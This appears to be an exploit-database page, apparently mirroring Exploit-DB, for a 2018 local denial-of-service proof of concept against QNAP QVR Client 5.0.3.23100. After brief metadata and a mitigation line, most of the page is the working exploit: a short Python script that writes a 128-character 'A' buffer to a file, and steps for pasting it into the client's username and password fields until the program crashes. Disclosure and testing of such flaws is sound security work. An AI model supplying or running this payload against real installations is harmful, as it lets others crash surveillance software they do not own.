header-logo
Suggest Exploit
vendor:
QVR Client
by:
Rodrigo Eduardo Rodriguez
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: QVR Client
Affected Version From: 5.0.3.23100
Affected Version To: 5.0.3.23100
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro x64 es
2018

QNap QVR Client 5.0.3.23100 – Denial of Service (PoC)

This exploit allows an attacker to cause a denial of service (DoS) on the QNap QVR Client 5.0.3.23100 software. By sending a specially crafted payload, the software crashes, rendering it unusable.

Mitigation:

Update to a patched version of the software or restrict access to the affected software.
Source

Exploit-DB raw data:

# Exploit Title : QNap QVR Client 5.0.3.23100 - Denial of Service (PoC)
# Discovery by  : Rodrigo Eduardo Rodriguez
# Discovery Date    : 2018-08-06
# Vendor Homepage: http://www.qnapsecurity.com/n/en/
# Software Link : http://download.qnap.com/Surveillance/Utility/QNewMon5.zip
# Tested Version    : 5.0.3.23100
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS  : Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python generatepaste.py
# 2.- Open generate.txt and copy content to clipboard
# 3.- Open QVR Client
# 4.- Direccion IP/Puerto -> 0.0.0.0 / 80
# 5.- Paste ClipBoard on "Nombre de Usuario" and "contraseña"
# 6.- Aceptar
# 7.- Crashed

#!/usr/bin/env python
# -*- coding: utf-8 -*-
buffer = "\x41" * 128
f = open ("generate.txt", "w")
f.write(buffer)
f.close()